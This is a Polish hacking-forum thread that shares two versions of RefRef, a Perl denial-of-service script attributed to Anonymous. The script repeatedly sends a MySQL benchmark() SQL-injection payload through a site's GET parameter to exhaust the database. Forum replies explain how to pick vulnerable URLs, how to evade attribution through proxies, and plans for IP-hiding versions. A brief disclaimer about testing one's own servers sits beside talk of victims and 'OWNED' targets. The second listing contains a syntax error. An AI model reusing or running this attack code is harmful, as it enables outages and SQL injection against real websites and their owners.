Temat: RefRef 1.3.1 DoS

=======================================
Nie ponosze odpowiedzialnosci za skutki dzialania tego skryptu
--------------------------------------------------
Webloic is only intented for web-server load testing (your OWN web-server), do not use it for large distributed denial of service attacks.

DDos may severely harm a business by causing a site to slow down or go down completely.

Causing harm can lead into lawsuits on behalf of the victim.

Discretion is adviced.
======================================
#RefRef zaprogramowany w Perl:

Kod:

#!usr/bin/perl
#RefRef 1.3.1 (C) Anonymous & NetSec 2011

use LWP::UserAgent;
use Net::Ping;
 
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
 
head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
syntax();
}
copyright();
 
sub now {
print "\n TARGET : ".$_[0]."\n\n";
print " AUTHORIZATION...\n";
my $auth = Net::Ping->new("icmp", 1, 64);
if ($auth->ping ($_[0])) {
print " EXPLOITATION...\n";
while(true) {
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
my $ver = Net::Ping->new("icmp", 1, 64);
if ($ver->ping ($_[0])) {
print " ERROR\n";
} else {
print " OWNED\n";
}
copyright();
}}} else { 
print " ERROR\n";
copyright();
}}
 
sub head {
print "\n\n------------------------------\n";
}
 
sub copyright {
print "\n------------------------------\n\n";
exit(1);
}
 
sub syntax {
print "\n SYNTAX: $0 \n";
copyright();
}
 
sub toma {
return $nave->get($_[0]);
}

RefRef 1.3.1 ;

Grubo :d

Napisał VR8

Opyla się znać podstawy wszystkich używanych języków, nie koniecznie pisać w nich programy

Zgadzam się. W moim przypadku na perla kiedyś też przyjdzie czas, lecz jeszcze nie dziś.
Pora przetestować

Co robi? - oto nowa słynna broń Anonymous #RefRef

Zbyt wyrafinowana to ona nie jest.

Zwykłe użycie funkcji benchmark() co możliwe zapytanie. To logiczne, że będzie działać. Ale na Waszym miejscu uważałbym z używaniem tego na lewo i prawo, bo pamiętaj, że gratis wysyłany jest Twój adres IP. No chyba, że odpowiednio o to zadbaliście.

Napisał djmentos

Zwykłe użycie funkcji benchmark() co możliwe zapytanie. To logiczne, że będzie działać. Ale na Waszym miejscu uważałbym z używaniem tego na lewo i prawo, bo pamiętaj, że gratis wysyłany jest Twój adres IP. No chyba, że odpowiednio o to zadbaliście.

Oczywiście. Jak napisałem (cytat) ostrzegam że używacie tego na własną odpowiedzialność, zaleca się dyskrecję a użycie może doprowadzić do procesów sądowych ze strony ofiary.

Można też użyć tej 'trutki' przez przeglądarkę, używając proxy. Kod który wstawiłem to tylko interfejs do tej komendy, dla mniej zaawansowanych.


W wersji #RefRef 1.4.? będzie ukrywane IP i kilka funkcji, ale potrzebny jest pierwsze pomysł jak to dobrze zrobić, i przede wszystkim troszkę czasu.

PS. Jest kilka wersji RefRef

Perl, 1.0.1 - 1.3.1
Python, 1.0.1
Javascript, 1.0.1 + funkcja ukrywania IP (Proxy)

A i nie używamy tego na prawo i lewo, tylko testy na wirtualych maszynach, darmowe hostingi, aż do pełnej anonimowości, czyli 1.4.0/1.4.1 lub 1.5.0/1.5.1

Michal31337 wow!
Czas przetestowac...

Napisał ShutteR

Jaka jest zasada podawania drugiej części adresu? Tą część: blad.php?sql=1 mogę skopiować z dowolnej podstrony ?

Jest to zmienna GET w pliku który przykładowo nazwałem blad.php
Strona jest podatna w 45% przypadkach, gdy w zmiennej GET jest zapytanie do MySQL.

Podstawy PHP.

Napisał pro+moc=ja

Witam.
Nie bardzo rozumiem dlaczego pojawia sie problem z autoryzacja:
errorvg.jpg

Nie wiem czemu ale na "nowszych" stronach skrypt szwankuje. Trzymaj starszą wersję:

Kod:

#!usr/bin/perl
#RefRef 1.2.0 (C) VR Eight & Anonymous 2011

use LWP::UserAgent;
 
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
 
head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
syntax();
}
copyright();
 
sub now {
print "\n TARGET : ".$_[0]."\n\n";
print " EXPLOITATION...\n";
while(true) {
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print " OWNED\n";
}
copyright();
} else { 
print " ERROR\n";
copyright();
}}
 
sub head {
print "\n\n------------------------------\n";
}
 
sub copyright {
print "\n------------------------------\n\n";
exit(1);
}
 
sub syntax {
print "\n SYNTAX: $0 \n";
copyright();
}
 
sub toma {
return $nave->get($_[0]);
}